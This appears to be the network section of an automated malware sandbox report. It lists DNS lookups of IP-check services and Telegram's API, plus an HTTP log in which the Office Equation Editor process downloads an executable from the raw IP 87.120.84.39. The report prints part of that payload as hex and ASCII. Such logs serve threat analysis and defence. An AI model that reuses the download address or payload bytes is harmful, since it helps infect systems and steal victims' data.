                                                                                                                                  Nov 19, 2024 18:08:10.208796024 CET8.8.8.8192.168.2.220xe257No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.208796024 CET8.8.8.8192.168.2.220xe257No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.208796024 CET8.8.8.8192.168.2.220xe257No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.208796024 CET8.8.8.8192.168.2.220xe257No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.920517921 CET8.8.8.8192.168.2.220xb2d1No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.920517921 CET8.8.8.8192.168.2.220xb2d1No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.652641058 CET8.8.8.8192.168.2.220x3d65No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.652641058 CET8.8.8.8192.168.2.220x3d65No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.652641058 CET8.8.8.8192.168.2.220x3d65No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.652641058 CET8.8.8.8192.168.2.220x3d65No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.652641058 CET8.8.8.8192.168.2.220x3d65No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.652641058 CET8.8.8.8192.168.2.220x3d65No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.661705017 CET8.8.8.8192.168.2.220x4211No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.661705017 CET8.8.8.8192.168.2.220x4211No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.661705017 CET8.8.8.8192.168.2.220x4211No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.661705017 CET8.8.8.8192.168.2.220x4211No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.661705017 CET8.8.8.8192.168.2.220x4211No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.661705017 CET8.8.8.8192.168.2.220x4211No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.182514906 CET8.8.8.8192.168.2.220x7bd9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.182514906 CET8.8.8.8192.168.2.220x7bd9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.857186079 CET8.8.8.8192.168.2.220xca0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.857186079 CET8.8.8.8192.168.2.220xca0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.857186079 CET8.8.8.8192.168.2.220xca0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.857186079 CET8.8.8.8192.168.2.220xca0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.857186079 CET8.8.8.8192.168.2.220xca0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.857186079 CET8.8.8.8192.168.2.220xca0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.867940903 CET8.8.8.8192.168.2.220xeb28No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.867940903 CET8.8.8.8192.168.2.220xeb28No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.867940903 CET8.8.8.8192.168.2.220xeb28No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.867940903 CET8.8.8.8192.168.2.220xeb28No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.867940903 CET8.8.8.8192.168.2.220xeb28No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.867940903 CET8.8.8.8192.168.2.220xeb28No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:15.470320940 CET8.8.8.8192.168.2.220x786dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:15.470320940 CET8.8.8.8192.168.2.220x786dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:15.480706930 CET8.8.8.8192.168.2.220x786dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:15.480706930 CET8.8.8.8192.168.2.220x786dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.140425920 CET8.8.8.8192.168.2.220x2362No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.140425920 CET8.8.8.8192.168.2.220x2362No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.140425920 CET8.8.8.8192.168.2.220x2362No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.140425920 CET8.8.8.8192.168.2.220x2362No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.140425920 CET8.8.8.8192.168.2.220x2362No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.140425920 CET8.8.8.8192.168.2.220x2362No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.151920080 CET8.8.8.8192.168.2.220xbf88No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.151920080 CET8.8.8.8192.168.2.220xbf88No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.151920080 CET8.8.8.8192.168.2.220xbf88No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.151920080 CET8.8.8.8192.168.2.220xbf88No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.151920080 CET8.8.8.8192.168.2.220xbf88No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.151920080 CET8.8.8.8192.168.2.220xbf88No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:17.795407057 CET8.8.8.8192.168.2.220xba1eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:17.795407057 CET8.8.8.8192.168.2.220xba1eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.781019926 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.781019926 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.781019926 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.781019926 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.781019926 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.781019926 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.789735079 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.789735079 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.789735079 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.789735079 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.789735079 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.789735079 CET8.8.8.8192.168.2.220xc616No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.804195881 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.804195881 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.804195881 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.804195881 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.804195881 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.804195881 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.810791969 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.810791969 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.810791969 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.810791969 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.810791969 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.810791969 CET8.8.8.8192.168.2.220x7bfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:19.500627041 CET8.8.8.8192.168.2.220xb75fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:19.500627041 CET8.8.8.8192.168.2.220xb75fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.159538031 CET8.8.8.8192.168.2.220xe13No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.159538031 CET8.8.8.8192.168.2.220xe13No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.159538031 CET8.8.8.8192.168.2.220xe13No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.159538031 CET8.8.8.8192.168.2.220xe13No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.159538031 CET8.8.8.8192.168.2.220xe13No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.159538031 CET8.8.8.8192.168.2.220xe13No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.170249939 CET8.8.8.8192.168.2.220xa689No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.170249939 CET8.8.8.8192.168.2.220xa689No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.170249939 CET8.8.8.8192.168.2.220xa689No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.170249939 CET8.8.8.8192.168.2.220xa689No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.170249939 CET8.8.8.8192.168.2.220xa689No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.170249939 CET8.8.8.8192.168.2.220xa689No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.665714979 CET8.8.8.8192.168.2.220x766cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.665714979 CET8.8.8.8192.168.2.220x766cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.309560061 CET8.8.8.8192.168.2.220x5282No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.309560061 CET8.8.8.8192.168.2.220x5282No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.309560061 CET8.8.8.8192.168.2.220x5282No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.309560061 CET8.8.8.8192.168.2.220x5282No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.309560061 CET8.8.8.8192.168.2.220x5282No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.309560061 CET8.8.8.8192.168.2.220x5282No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.829715014 CET8.8.8.8192.168.2.220x2cd2No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.829715014 CET8.8.8.8192.168.2.220x2cd2No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET8.8.8.8192.168.2.220x250cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET8.8.8.8192.168.2.220x18abNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.013624907 CET8.8.8.8192.168.2.220xdbe7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.013624907 CET8.8.8.8192.168.2.220xdbe7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.690304995 CET8.8.8.8192.168.2.220x8295No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • api.telegram.org
                                                                                                                                  • 87.120.84.39
                                                                                                                                  • checkip.dyndns.org

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.224916187.120.84.39803600C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 19, 2024 18:08:03.436898947 CET322OUTGET /txt/Xkl0PnD8zFPjfh1.exe HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                  Host: 87.120.84.39
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Nov 19, 2024 18:08:04.159611940 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.26.2
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:04 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 837120
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 04:32:51 GMT
                                                                                                                                  ETag: "cc600-6273c86a96582"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 05 12 3c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0c 00 00 22 00 00 00 00 00 00 fe bf 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac bf 0c 00 4f 00 00 00 00 e0 0c 00 e8 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<g0" @ @O H.text `.rsrc @@.reloc@BHh^6D*0]7%rp%%rp%%rp((soo,o*2Q0a7%rp%%rp%%rp((soo,o+*2P0BrprAp((so o,o*60FrprAp((
                                                                                                                                  Nov 19, 2024 18:08:04.159629107 CET224INData Raw: 1c 00 00 0a 0b 00 73 1f 00 00 0a 0c 08 07 6f 21 00 00 0a a5 01 00 00 1b 0a 07 6f 1a 00 00 0a 00 00 de 0b 07 2c 07 07 6f 1b 00 00 0a 00 dc 06 0d 2b 00 09 2a 00 00 01 10 00 00 02 00 17 00 1e 35 00 0b 00 00 00 00 1b 30 04 00 67 00 00 00 05 00 00 11
                                                                                                                                  Data Ascii: so!o,o+*50g7%rp%%rp%%rp((("s#o$o,o*2)[0:(
                                                                                                                                  Nov 19, 2024 18:08:04.159641027 CET1236INData Raw: 01 00 00 1b 28 22 00 00 0a 73 23 00 00 0a 0c 08 07 6f 25 00 00 0a a5 01 00 00 1b 0a 00 de 0b 07 2c 07 07 6f 1b 00 00 0a 00 dc 06 0d 2b 00 09 2a 00 00 01 10 00 00 02 00 08 00 21 29 00 0b 00 00 00 00 22 02 28 26 00 00 0a 00 2a 00 00 00 13 30 02 00
                                                                                                                                  Data Ascii: ("s#o%,o+*!)"(&*0e(&rKp}rUp}}{}"}"}"}"}}*0Q(&}}}{}
                                                                                                                                  Nov 19, 2024 18:08:04.159651041 CET1236INData Raw: 02 73 37 00 00 0a 7d 17 00 00 04 02 73 34 00 00 0a 7d 18 00 00 04 02 73 35 00 00 0a 7d 19 00 00 04 02 73 36 00 00 0a 7d 1a 00 00 04 02 73 37 00 00 0a 7d 1b 00 00 04 02 73 34 00 00 0a 7d 1c 00 00 04 02 73 35 00 00 0a 7d 1d 00 00 04 02 73 36 00 00
                                                                                                                                  Data Ascii: s7}s4}s5}s6}s7}s4}s5}s6}s7}s4} s5}!s6}"s7}#s4}$s5}%s6}&s7}'s8}(s9}*s9}+s9},s9}-
                                                                                                                                  Nov 19, 2024 18:08:04.159658909 CET448INData Raw: 44 00 00 0a 00 02 7b 16 00 00 04 17 6f 45 00 00 0a 00 02 7b 17 00 00 04 28 4b 00 00 06 6f 48 00 00 0a 00 02 7b 17 00 00 04 19 19 73 40 00 00 0a 6f 41 00 00 0a 00 02 7b 17 00 00 04 72 ef 00 00 70 6f 42 00 00 0a 00 02 7b 17 00 00 04 1f 7a 1f 64 73
                                                                                                                                  Data Ascii: D{oE{(KoH{s@oA{rpoB{zdsCoD{oI{oJ{oK{(<o={o>{+o?{o>{o?{o>{o?{o>{o?{
                                                                                                                                  Nov 19, 2024 18:08:04.159670115 CET1236INData Raw: 04 72 27 01 00 70 6f 42 00 00 0a 00 02 7b 1a 00 00 04 1f 7a 1f 0a 73 43 00 00 0a 6f 44 00 00 0a 00 02 7b 1a 00 00 04 17 6f 45 00 00 0a 00 02 7b 1b 00 00 04 28 4b 00 00 06 6f 48 00 00 0a 00 02 7b 1b 00 00 04 19 19 73 40 00 00 0a 6f 41 00 00 0a 00
                                                                                                                                  Data Ascii: r'poB{zsCoD{oE{(KoH{s@oA{rApoB{zdsCoD{oI{oJ{oK{(<o={o>{,o?{o>{o?{o>{o?
                                                                                                                                  Nov 19, 2024 18:08:04.159679890 CET1236INData Raw: 00 00 73 40 00 00 0a 6f 41 00 00 0a 00 02 7b 24 00 00 04 72 fd 01 00 70 6f 42 00 00 0a 00 02 7b 24 00 00 04 1f 7d 20 ba 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 00 02 7b 24 00 00 04 1f 0b 6f 45 00 00 0a 00 02 7b 25 00 00 04 1f 14 20 84 00 00 00 73
                                                                                                                                  Data Ascii: s@oA{$rpoB{$} sCoD{$oE{% s@oA{%rpoB{%KsCoD{%oE{%rpoF{%oG{&ms@oA{&rpoB{&zsCoD{&oE
                                                                                                                                  Nov 19, 2024 18:08:04.159698963 CET448INData Raw: 00 02 28 3e 00 00 0a 02 7b 14 00 00 04 6f 3f 00 00 0a 00 02 28 3e 00 00 0a 02 7b 10 00 00 04 6f 3f 00 00 0a 00 02 28 52 00 00 0a 6f 53 00 00 0a 00 02 17 28 54 00 00 0a 00 02 17 28 55 00 00 0a 00 02 7b 10 00 00 04 16 6f 56 00 00 0a 00 02 7b 10 00
                                                                                                                                  Data Ascii: (>{o?(>{o?(RoS(T(U{oV{oW{oX{oV{oW{oX{oV{oW{oX{oV{oW{oX{ oV{ oW{#
